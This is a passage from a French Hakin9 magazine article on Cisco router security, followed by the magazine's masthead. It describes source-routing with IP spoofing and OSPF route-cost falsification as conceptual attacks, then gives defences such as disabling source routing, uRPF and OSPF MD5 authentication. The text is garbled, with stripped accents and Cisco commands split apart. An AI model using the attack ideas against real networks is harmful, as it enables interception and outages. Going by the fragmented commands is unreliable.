cette interface any Utilise l'option " loose mode " sur cette interface allow-default (Facultatif) Le trafic est autoris sur une seule route (0.0.0.0 /0) allow-self-ping (Facultatif) Autorise le routeur effectuer un ping sur son interface list (Facultatif) Autorise ou rejette le trafic ACL. En fonctionnement, il est prfrable d'appliquer un accessgroup (groupe d'accs) sur l'interface pour des raisons de commodit.

Exemple de configuration : " strict mode " avec route par dfaut

TECHNIQUE
Source Record Route (SSRR, IP option 137) et Loose Source Record Route (LSRR, IP option 131). Bien que leurs diffrences soient expliques ci-dessous, les mcanismes derrire ces deux concepts reposent sur le principe suivant : la valeur du champ de destination d'un paquet est remplace par un pointeur qui ramne vers le haut de la pile, le routage source. Le pointeur est modifi en avanant dans la pile jusqu' ce que la dernire adresse IP soit atteinte. Option SSRR (Strict Source Record Routing) : option spcifique. L'metteur du paquet spcifie la liste des machines sur lesquelles doit passer le paquet avant d'arriver destination. A la diffrence de l'option LSRR, s'il y a des trous de routage entre 2 machines spcifies, le routage dynamique ne reprend pas ses droits et le paquet est perdu. L'utilisation de cette option demande une connaissance approfondie de l'infrastructure rseau entre le PC de pirate et celui de sa cible, le rsultat est le contrle total de l'environnement travers par le paquet. L'option LSRR (Loose Source Record Routing) : approche simplifie. L'metteur du paquet spcifie une liste de machines par lesquelles doit passer le paquet avant d'arriver destination. S'il y a des trous de routage entre 2 machines spcifies, le routage dynamique reprend ses droits. Mise part certaines techniques de piratage, la plupart des fournisseurs d'accs refusent de propager les paquets dIP prsentant ces options. On peut se demander lgitimement, pourquoi ces options sont considres comme dangereuses outre le fait qu'elles permettent de router des listes d'accs ou sniffers ? Si ces options sont combines avec une attaque par usurpation d'adresse IP et qu'un hte cible accepte l'inversion de pile RSNR / LSRR alors il est possible d'exploiter des relations de confiance entre deux htes. Ceci permet un client d'usurper une adresse IP prive, de confiance, partir d'un rseau distinct (comme Internet) et d'assurer ainsi une conversation bidirectionnelle.

Exemple
David veut accder un serveur extrieur depuis son entreprise. Mais il y a un problme, un pare-feu filtre les connexions entrantes et sortantes. David a dj effectu une reconnaissance du rseau et sait qu'il existe une route alternative, c'est par celle-ci qu'il souhaite passer (Voir Figure 2).

Dfense
Le systme de dfense contre le source-routing dans un rseau Cisco s'appuie sur un double processus. La premire tape consiste relire le paragraphe sur l'attaque par usurpation d'adresse IP autorisant l'uRPF. La deuxime tape consiste dsactiver le source-routing sur le routeur lui-mme. Cela se fait trs simplement en entrant dans le mode de configuration du routeur et en tapant la commande suivante :
Router(config)#no ip source-route

abus du protocole de routage

Que ce soit par un protocole RIP (simple) jusqu' des hirarchies plus complexes telle que OSPF, les protocoles de routage permettant des gagner du temps et vitent chaque anne des milliers d'heures de configuration pour les administrateurs. L'automatisation a cependant ses dfauts - si les protocoles ne sont pas convenablement scuriss, un pirate peut effectuer une attaque de type man-inthe-middle ou par dni de service contre l'ensemble du rseau. Cette menace n'est pas prendre la lgre - J'ai vu des grandes entreprises gnrant des profits de plusieurs milliards de dollars vulnrables ce type d'attaque. En soi c'est inconcevable. Rappelez-vous que ces vulnrabilits ayant trait aux domaines de routage, sont dues un manque de scurit des routeurs.

Comment a marche ?
En raison de la multiplicit des protocoles de routage je ne me m'attarderai pas tous les exposer je vous propose d'examiner les

mcanismes d'authentification disponibles pour Open Shortest Path First (OSPF) version 2, un des protocoles les plus couramment dploys au sein des rseaux privs. Soyez conscient, toutefois, que les mcanismes prsents ici sont communs tous les protocoles. OSPF, comme d'autres protocoles de routage met en uvre le processus suivant. Il est activ selon chaque sousrseau, ainsi que chaque interface convenablement configure. Le protocole OSPF construit une table interne qui recense les sous-rseaux connus ainsi que le cot (Cf. Formule ci-dessous). Ce protocole n'envoie pas aux routeurs adjacents le nombre de sauts qui les spare, mais l'tat de la liaison qui les spare. Ceci est rendu possible grce aux paquets Hello envoys l'adresse multicast : 224.0.0.5 Chaque routeur est capable de dresser une carte de l'tat du rseau et peut par consquent choisir tout moment la route la plus approprie pour un message donn. Aprs avoir reu une rponse, OSPF procde un change des paramtres au cours du protocole Handshake avec ses voisins ainsi que les tables de routage. Lorsqu'un routeur procde ce dernier change il est considr comme adjacent et communiquera priodiquement pour s'assurer de l'activit de ses voisins sur le rseau. Le meilleur chemin est calcul grce l'algorithme de Dijkstra en profitant des capacits du CPU. Sur un routeur Cisco, cela signifie que les sous-rseaux qui ont pris connaissance du protocole OSPF peuvent dsormais tre recenss dans la table de routage. Il est intressant de dtailler le protocole OSPF, qui utilise le cot comme mtrique pour dterminer la meilleure route. Bien que ce calcul diffre selon les matriels, tous les priphriques Cisco utilisent la mme formule :
Cot = Bande passante de l'interface

de rfrence / Bande passante

72 HAKIN9 6/2009

ROUTER
O :
Bande passante = 100Mbps

Par exemple, un lien de 10Mbps aurait un cot de 10, tandis qu'un lien de 100Mbps aurait un cot de 1. Comme il n'y a pas de fractions disponibles pour OSPF, les connexions Gigabit et 10 Gigabit ont galement un cot par dfaut fix 1 (il existe des mcanismes permettant de modifier la largeur de bande passante de rfrence pour s'assurer que ces liens sont bien utiliss). En termes de routage, la meilleure interface qu'un routeur puisse utiliser lorsqu'il renvoi du trafic est celle ayant le cot total le plus bas sur le sous-rseau. A ce stade, un utilisateur malveillant pourrait excuter un processus OSPF sur un ordinateur connect au rseau et construire un tableau des cots falsifi pour rediriger le trafic vers son PC plutt que le destinataire d'origine. Un pirate peut causer une panne de rseau sur des dizaines, des centaines voire des milliers de postes utilisateurs. Si un pirate devait avoir une deuxime connexion un dispositif suffisamment loigne de son voisin ayant subit l'attaque (en termes de cots de routage) ou sur un autre rseau (par exemple, Internet), il pourrait effectuer une attaque man-inthe-middle l'encontre de chaque utilisateur grce au trafic qu'il a intercept (Voir Figure 3). La seconde vulnrabilit critique dans ce processus implique la modification des tables OSPF, mais cette fois-ci dans un but diffrent. Chaque routeur dans une zone administrative donne dispose des tables de cots pour l'ensemble de ses voisins, ainsi qu'une image du rseau et peut appliquer l'algorithme de Dijkstra. Il est possible pour un pirate d'injecter rapidement de nouvelles routes ou de modifier des paramtres sur des routes existantes et provoquer ainsi un pic de transformation sur l'ensemble des routeurs du domaine. Cette attaque peut tre particulirement coteuse pour une organisation selon son architecture, en effet les routages peuvent tre refuss entre chaque sous-rseau de l'entreprise.

J'ai eu l'occasion par le pass de voir cette attaque mettre mal le travail de plus de 10 000 salaris. Elle est extrmement puissante et provoque un arrt de la transmission des informations sur les diffrents sousrseaux. Identifier l'origine du problme est un vritable dfi.

videntes, nous n'aborderons pas la mthode d'authentification en texte clair. Exemple : Utiliser OSPF pour effectuer une authentification.
Router(config)#router ospf 1 Router(config-router) message-digest #area 0 authentication

Prvention des risques

Cisco dispose de deux mthodes complmentaires pour attnuer les risques d'attaques par OSPF. L'administrateur peut notamment dsactiver l'utilisation des messages multicast OSPF sur certains liens, et exiger de ses voisins une authentification. Lorsque l'on dcide de dsactiver l'utilisation des messages multicast (reus par chaque hte dans un sousrseau), il existe deux options : une dsactivation gnrale ou au cas par cas des interfaces. Les deux options sont valables en fonction de la conception du rseau, toutefois pour rduire le niveau de complexit et augmenter la scurit, il est gnralement recommand de lister les interfaces sensibles et de les protger. Toute interface en mode passif n'envoie pas de paquets Hello de type OSPF, ni les processus reus, cette configuration est idale pour toute interface qui n'a pas se connecter un routeur expressment approuv OSPF. Exemple : Prvenir les connexions adjacentes OSPF sur les interfaces Fa0/1
Router(config-router) Router(config-router)

Router(config-router) Router(config-if) #interface Fa0/1

#ip ospf message-digest-key [key number] md5 [password]

Liste de vrification
Scuriser physiquement les routeurs. Restreindre l'accs distance pour scuriser des protocoles tels que SSH et configurer l'accs aux listes pour autoriser une gestion partir des htes ou sous-rseaux. Implmenter de prfrence une authentification AAA via RADIUS ou TACACS+. Configurer les demandes de connexion, SNMPv3, et au besoin un sniffer. Activer uRPF le cas chant, sur toutes les interfaces. Dsactiver le source-routing IP. Scuriser les protocoles de routage en dsactivant la publicit inutile et ncessitant une authentification. Dsactiver les redirections ICMP. Dsactiver le proxy ARP. Configurer l'accs aux listes en utilisant le modle de moindre privilge. Scuriser le NTP, en dsactivant le service ou celui de l'authentification.

#passive-interface default #no passive-interface Fa0/1

La seconde tape dans la scurisation d'un domaine de routage OSPF consiste autoriser l'authentification entre machines voisines. Dans cet exemple, l'algorithme MD5 est utilis pour gnrer un hachage partir du paquet OSPF d'origine et sa cl est transmise avec le paquet sous la forme d'un identifiant et numro de squence. L'autre partie utilise sa cl pour calculer le code de hachage puis compare les deux. S'ils sont similaires, l'adjacence est conserve et le processus se poursuit. Pour des raisons

Les lments cits dans le prsent article ne sont ni cautionns ni sponsoriss par Cisco Systems, Inc Cisco, Cisco Systems, CCIE et le logo CCIE qui sont des marques dposes de Cisco Systems, Inc. et ses affilis. Ryan Gamo
Ryan travaille depuis plus de dix ans dans le secteur informatique, dont huit ans en tant qu'ingnieur rseau. Il a acquis une exprience riche et solide en implmentant des solutions professionnelles pour des entreprises du service public, de l'industrie mdicale et du secteur de la fabrication. Actuellement, il est DSI (Directeur des Systmes Informatiques) dans un hpital Orange County, en Californie. Pendant son temps libre, il profite de sa famille, frquente les salles de sport, joue Quake, et fait du skateboard. Vous pouvez le contacter : ryan.gamo@gmail.com 6/2009 HAKIN9 73

EN NOVEMBRE
Dans le prochain numro
PRATIQUE
Cette rubrique vous permettra de connatre une mthode dattaque et dappliquer les moyens de dfense mettre en place.

Toute l'actualit du prochain numro sur le site www.hakin9.org/fr.

EN BREF
L`actualit du monde de la scurit informatique et des systmes d`information. Les nouvelles failles, les intrusions web et les nouvelles applications.

SUR LE CD
Comme toujours dans chaque numro nouv vous proposons hakin9.live avec la distributions BackTrack 3. Applications commerciales en versions compltes et des programmes en exclusivit, pour la scurit, la protection et la stabilit de votre systme. Des tutoriels vido pratiques afin de mieux comprendre les mthodes offensives.

TECHNIQUE
Cette fois-ci nous vous prsenterons un article Slitaz 2.0 par Julien Smyczynski.

FEUILLETON
Un regard prcis et pertinent sur la scurit informatique.

DATA RECOVERY
Dans cette rubrique vous allez suivre les risques lis aux donnes, de la cl USB au serveur, les risques de pertes, mais aussi de vol de donnes, les moyens de protectios lis ces priphriques.

Vous souhaitez collaborer a la rdaction des articles? N`hsitez pas nous contacter! FR@HAKIN9.ORG Ce numro sera disponible en janvier. La rdaction se rserve le droit de modifier le contenu de la revue.

Le bimestriel hakin9 est publi par Software Press Sp. z o. o. SK Prsident de Software Press Sp. z o. o. SK: Pawe Marciniak Directrice de la publication: Ewa Lozowicka Redacteur en chef: Jakub Borowski jakubborowski@hakin9.org Fabrication: Andrzej Kuca andrzej.kuca@software.com.pl DTP : Graphics & Design Marcin Zikowski www.gdstudio.pl Couverture : Agnieszka Marchocka Couverture CD : Przemyslaw Banasiewicz Publicit : publicite@software.com.pl Abonnement : software@emdnl.nl Diffusion : Ilona Lepieszka Ilona.lepieszka@software.com.pl Dpt lgal : parution ISSN : 1731-7037 Distribution : MLP

Parc dactivits de Chesnes, 55 bd de la Noire BP 59 F - 38291 SAINT-QUENTIN-FALLAVIER CEDEX (c) 2009 Software Press Sp. z o. o. SK, tous les droits rservs Bta-testeurs : Didier Sicchia, Pierre Louvet, Anthony Marchetti, Rgis Senet, Paul Amar, Julien Smyczynski Les personnes intresses par la coopration sont invites nous contacter : fr@hakin9.org Prparation du CD : Rafal Kwany Imprimerie, photogravure : ArtDruk www.artdruk.com Adresse de correspondance : Software Press Sp. z o. o. SK Bokserska 1, 02-682 Varsovie, Pologne Tl. +48 22 427 32 87, Fax. +48 22 244 24 59 www.hakin9.org

Abonnement (France mtropolitaine, DOM/TOM) : 1 an (soit 6 numros) 35 La rdaction fait tout son possible pour sassurer que les logiciels sont jour, elle dcline toute responsabilit pour leur utilisation. Elle ne fournit pas de support technique li linstallation ou lutilisation des logiciels enregistrs sur le CD-ROM. Tous les logos et marques dposs sont la proprit de leurs propritaires respectifs. Le CD-ROM joint au magazine a t test avec AntiVirenKit de la socit G Data Software Sp. z o.o. AVERTISSEMENT Les techniques prsentes dans les articles ne peuvent tre utilises quau sein des rseaux internes. La rdaction du magazine nest pas responsable de lutilisation incorrecte des techniques prsentes. Lutilisation des techniques prsentes peut provoquer la perte des donnes !

82

HAKIN9 5/2008

La rdaction se rserve le droit de modifier le contenu de la revue